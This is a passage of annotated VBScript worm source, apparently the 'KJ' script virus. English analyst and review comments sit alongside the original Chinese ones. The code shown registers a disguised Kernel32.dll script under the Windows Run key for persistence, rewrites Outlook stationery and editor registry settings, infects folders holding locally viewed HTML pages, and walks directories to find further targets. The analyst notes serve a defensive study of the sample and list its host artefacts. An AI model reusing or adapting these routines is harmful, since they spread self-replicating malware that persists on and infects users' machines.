Call KJMailReg("HKEY_CURRENT_USER\Software\Microsoft\Windows
Messaging
Subsystem\Profiles\Microsoft Outlook Internet
Settings\0a0d020000000000c000000000000046\001e0360","blank")
Call KJMailReg("HKEY_CURRENT_USER\Software\Microsoft\Windows
NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Microsoft Outlook
Internet Settings\0a0d020000000000c000000000000046\001e0360","blank")
WsShell.RegWrite
"HKEY_CURRENT_USER\Software\Microsoft\Office\10.0
\Outlook\Options\Mail\EditorPreference",131072,"REG_DWORD"
KJummageFolder(Left(WinPath,3) & "Program Files\Common
Files\Microsoft
Shared\Stationery")
End Function
' Function: KJCreateMilieu()
' Purpose (original author's note): create the system environment.
' What the visible code does: chooses a startup file path under WinPath & "SYSTEM\",
' registers that path as the value "Kernel32" under the HKLM ...\CurrentVersion\Run key,
' and writes the script text held in VbsText into that file.
' Analyst note: this is the sample's persistence step. Host artefacts that follow from the
' code below are a Run value named "Kernel32" and a SYSTEM\Kernel32.dll or SYSTEM\Kernel.dll
' whose content is plain script text rather than a PE image.
' NOTE(review): WinPath, FSO, WsShell and VbsText are defined outside this excerpt;
' WinPath is presumably the Windows directory with a trailing backslash - confirm.
' NOTE(review): how a file with a .dll extension ends up being run as script is not
' shown in this excerpt.
Function KJCreateMilieu()
' Runtime errors are ignored from here on, so a failed registry or file write is silent.
On Error Resume Next
TempPath = ""
' Decide whether the OS is NT/2000 or 9x: WScript.exe missing from WinPath is taken to mean NT/2000.
If Not(FSO.FileExists(WinPath & "WScript.exe")) Then
TempPath = "system32\"
End If
' Original author's note: the file name is chosen to look legitimate without
' colliding with a real system file.
' On NT/2000 the startup file is SYSTEM\Kernel32.dll
' On 9x the startup file is SYSTEM\Kernel.dll
If TempPath = "system32\" Then
StartUpFile = WinPath & "SYSTEM\Kernel32.dll"
Else
StartUpFile = WinPath & "SYSTEM\Kernel.dll"
End If
' Add a Run value that points at the startup file chosen above.
' NOTE(review): the statement below is wrapped over three lines in this listing, with one
' break inside the string literal; it is presumably a single line in the original script.
WsShell.RegWrite
"HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\Kernel32
",StartUpFile
' Write the script body (VbsText) into the startup file.
' OpenTextFile arguments: 2 = ForWriting, true = create the file if it does not exist.
Set FileTemp = FSO.OpenTextFile(StartUpFile,2,true)
FileTemp.Write VbsText
FileTemp.Close
End Function
' Function: KJLikeIt()
' Purpose (original author's note): handle the HTML case - when the page being viewed is a
' local file or a file on a share, the directory that holds it is infected.
' What the visible code does: derives a directory path from document.location and passes
' it to KJummageFolder; nothing happens for locations that do not start with "file".
' NOTE(review): InWhere, FSO and KJummageFolder are defined outside this excerpt.
Function KJLikeIt()
' Do nothing unless the script is running inside an HTML page.
If InWhere <> "html" Then
Exit Function
End If
' Take the location of the current document.
ThisLocation = document.location
' Only local files and files on a network share are handled.
If Left(ThisLocation, 4) = "file" Then
' Keep everything from the 9th character on, i.e. drop the first eight characters
' (the length of a "file:///" prefix).
ThisLocation = Mid(ThisLocation,9)
' If the path has a file extension, cut the file name off so only the directory part remains.
' NOTE(review): the assignment below is wrapped over two lines in this listing.
If FSO.GetExtensionName(ThisLocation) <> "" then
ThisLocation = Left(ThisLocation,Len(ThisLocation) -
Len(FSO.GetFileName(ThisLocation)))
End If
' Append a "\" when the path is longer than 3 characters.
If Len(ThisLocation) > 3 Then
ThisLocation = ThisLocation & "\"
End If
' Original author's note: infect this directory.
KJummageFolder(ThisLocation)
End If
End Function
' Function: KJMailReg(RegStr,FileName)
' Purpose: if the given registry value does not exist, write the given file name to it.
' Parameters:
'   RegStr   - full registry path of the value to check and set
'   FileName - string written to RegStr when the value reads back as ""
' Analyst note: a value that already holds a non-empty string is left untouched, so only
' values that were unset or empty beforehand are changed by this function.
' NOTE(review): WsShell is defined outside this excerpt.
Function KJMailReg(RegStr,FileName)
' Errors are ignored: a failed RegRead (for example a missing value) leaves RegTempStr
' unassigned, and in VBScript that compares equal to "" in the test below.
On Error Resume Next
' Read the current value; a missing value and an empty value are treated the same way.
RegTempStr = WsShell.RegRead(RegStr)
If RegTempStr = "" Then
WsShell.RegWrite RegStr,FileName
End If
End Function
' 函数:KJOboSub(CurrentString)
' 功能:遍历并返回目录路径
' 参数:
' CurrentString 当前目录
Function KJOboSub(CurrentString)
SubE = 0
TestOut = 0
Do While True
TestOut = TestOut + 1
If TestOut > 28 Then
CurrentString = FinalyDisk & ":\"
Exit Do
End If
On Error Resume Next
' 取得当前目录的所有子目录,并且放到字典中
Set ThisFolder = FSO.GetFolder(CurrentString)
Set DicSub = CreateObject("Scripting.Dictionary")
Set Folders = ThisFolder.SubFolders
FolderCount = 0
For Each TempFolder in Folders
FolderCount = FolderCount + 1
DicSub.add FolderCount, TempFolder.Name
Next
' 如果没有子目录了,就调用KJChangeSub返回上一级目录或者更换盘
符,并将SubE置1
If DicSub.Count = 0 Then
LastIndexChar =
InstrRev(CurrentString,"\",Len(CurrentString)-1)
SubString =
Mid(CurrentString,LastIndexChar+1,Len(CurrentString)-LastIndexChar-1)
CurrentString = KJChangeSub(CurrentString,LastIndexChar)
SubE = 1
Else
' 如果存在子目录
' 如果SubE为0,则将CurrentString变为它的第1个子目录